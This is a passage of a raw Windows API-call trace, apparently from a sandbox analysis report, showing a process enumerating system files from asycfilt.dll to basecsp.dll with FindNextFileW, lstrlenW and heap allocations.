(HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x717848 [0060.385] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e661b3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84e661b3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84e661b3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asycfilt.dll", cAlternateFileName="")) returned 1 [0060.385] lstrlenW (lpString="asycfilt.dll") returned 12 [0060.385] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7178f8 [0060.385] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9839a69, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe9839a69, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x658ceec0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0060.385] lstrlenW (lpString="at.exe") returned 6 [0060.386] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8e) returned 0x7179a0 [0060.386] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaedcb3c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaedcb3c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0060.386] lstrlenW (lpString="AtBroker.exe") returned 12 [0060.386] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717a38 [0060.386] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2b74b, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x2d2b74b, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x805466c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl.dll", cAlternateFileName="")) returned 1 [0060.386] lstrlenW (lpString="atl.dll") returned 7 [0060.386] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x90) returned 0x717ae0 [0060.386] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b0b4600, ftCreationTime.dwHighDateTime=0x1cc2787, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x4b0b4600, ftLastWriteTime.dwHighDateTime=0x1cc2787, nFileSizeHigh=0x0, nFileSizeLow=0x21b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl100.dll", cAlternateFileName="")) returned 1 [0060.386] lstrlenW (lpString="atl100.dll") returned 10 [0060.386] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x7157c0 [0060.386] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b8ce00, ftCreationTime.dwHighDateTime=0x1ce64f7, ftLastAccessTime.dwLowDateTime=0xef797c80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x29b8ce00, ftLastWriteTime.dwHighDateTime=0x1ce64f7, nFileSizeHigh=0x0, nFileSizeLow=0x28248, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl110.dll", cAlternateFileName="")) returned 1 [0060.386] lstrlenW (lpString="atl110.dll") returned 10 [0060.386] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x715860 [0060.386] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9363019e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9363019e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x936562fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmfd.dll", cAlternateFileName="")) returned 1 [0060.387] lstrlenW (lpString="atmfd.dll") returned 9 [0060.387] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x94) returned 0x715900 [0060.387] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9360a03e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9360a03e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9363019e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmlib.dll", cAlternateFileName="")) returned 1 [0060.387] lstrlenW (lpString="atmlib.dll") returned 10 [0060.387] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x7159a0 [0060.387] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf3c4130, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xbf3c4130, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0060.387] lstrlenW (lpString="attrib.exe") returned 10 [0060.387] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x715a40 [0060.387] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4204ec3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4204ec3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4204ec3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodev.dll", cAlternateFileName="")) returned 1 [0060.387] lstrlenW (lpString="audiodev.dll") returned 12 [0060.387] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717b78 [0060.387] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f79a81, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78f79a81, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80675280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioEng.dll", cAlternateFileName="")) returned 1 [0060.387] lstrlenW (lpString="AudioEng.dll") returned 12 [0060.388] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717c38 [0060.388] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce47270e, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xce47270e, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xad59f9a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6c200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUDIOKSE.dll", cAlternateFileName="")) returned 1 [0060.388] lstrlenW (lpString="AUDIOKSE.dll") returned 12 [0060.388] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717ce0 [0060.388] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87266eb6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x87266eb6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87266eb6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2fc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioSes.dll", cAlternateFileName="")) returned 1 [0060.388] lstrlenW (lpString="AudioSes.dll") returned 12 [0060.388] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717d88 [0060.388] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ceb7bb, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x68ceb7bb, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditNativeSnapIn.dll", cAlternateFileName="")) returned 1 [0060.388] lstrlenW (lpString="AuditNativeSnapIn.dll") returned 21 [0060.388] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xac) returned 0x719c20 [0060.388] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735a0a8d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x735a0a8d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x65a00190, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0060.388] lstrlenW (lpString="auditpol.exe") returned 12 [0060.388] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x717e30 [0060.388] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1010d4, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6a1010d4, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditPolicyGPInterop.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="AuditPolicyGPInterop.dll") returned 24 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb2) returned 0x719cd8 [0060.389] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6732ea88, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6732ea88, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xf6ab4570, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolmsg.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="auditpolmsg.dll") returned 15 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa0) returned 0x717ed8 [0060.389] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08b31c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xb08b31c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808b0720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x51a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="authfwcfg.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="authfwcfg.dll") returned 13 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9c) returned 0x717f80 [0060.389] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a14413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x9a14413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808fe920, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x48a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWGP.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="AuthFWGP.dll") returned 12 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718028 [0060.389] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aed7d9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9aed7d9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9af4a1bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4d5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapin.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="AuthFWSnapin.dll") returned 16 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa2) returned 0x719d98 [0060.389] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eeeaef, ftCreationTime.dwHighDateTime=0x1ca0406, ftLastAccessTime.dwLowDateTime=0xcd1a5500, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0x3931bcc5, ftLastWriteTime.dwHighDateTime=0x1ca0421, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.dll", cAlternateFileName="")) returned 1 [0060.389] lstrlenW (lpString="AuthFWWizFwk.dll") returned 16 [0060.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa2) returned 0x719e48 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acdeb81, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8acdeb81, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad04ce2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1b5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="authui.dll", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="authui.dll") returned 10 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x715ae0 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x714738cc, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x714738cc, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80ac71d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="authz.dll", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="authz.dll") returned 9 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x94) returned 0x715b80 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d92e0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85d92e0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85f5be93, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="autochk.exe") returned 11 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715c20 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332c5e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8332c5e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83352741, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="autoconv.exe") returned 12 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7180d0 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cae5ce, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85cae5ce, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85cd472e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa0e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="autofmt.exe") returned 11 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715cc0 [0060.390] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9bee9c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoplay.dll", cAlternateFileName="")) returned 1 [0060.390] lstrlenW (lpString="autoplay.dll") returned 12 [0060.390] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718178 [0060.391] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc3f99b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xfdc3f99b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x80b12cc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayApi.dll", cAlternateFileName="")) returned 1 [0060.391] lstrlenW (lpString="AuxiliaryDisplayApi.dll") returned 23 [0060.391] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb0) returned 0x719ef8 [0060.391] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a8ae8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67a8ae8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67cec49, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayCpl.dll", cAlternateFileName="")) returned 1 [0060.391] lstrlenW (lpString="AuxiliaryDisplayCpl.dll") returned 23 [0060.391] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb0) returned 0x719fb0 [0060.391] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8898fb50, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8898fb50, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80c1ce90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="avicap32.dll", cAlternateFileName="")) returned 1 [0060.391] lstrlenW (lpString="avicap32.dll") returned 12 [0060.391] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718220 [0060.391] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b15f501, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b15f501, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b185661, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="avifil32.dll", cAlternateFileName="")) returned 1 [0060.391] lstrlenW (lpString="avifil32.dll") returned 12 [0060.391] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7182c8 [0060.391] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb761c16, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb761c16, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x80d75260, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="avrt.dll", cAlternateFileName="")) returned 1 [0060.391] lstrlenW (lpString="avrt.dll") returned 8 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x92) returned 0x715d60 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1533a9b1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x1533a9b1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x5df3f69c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0xa273, dwReserved0=0x0, dwReserved1=0x0, cFileName="azman.msc", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="azman.msc") returned 9 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849c970b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849c970b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849ef86b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xba400, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroles.dll", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="azroles.dll") returned 11 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715e00 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba1c5fa, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ba1c5fa, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ba4275a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroleui.dll", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="azroleui.dll") returned 12 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718370 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849a35ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849a35ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849c970b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzSqlExt.dll", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="AzSqlExt.dll") returned 12 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718418 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afe273e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9afe273e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9afe273e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23580, dwReserved0=0x0, dwReserved1=0x0, cFileName="basecsp.dll", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="basecsp.dll") returned 11 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715ea0 [0060.392] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: 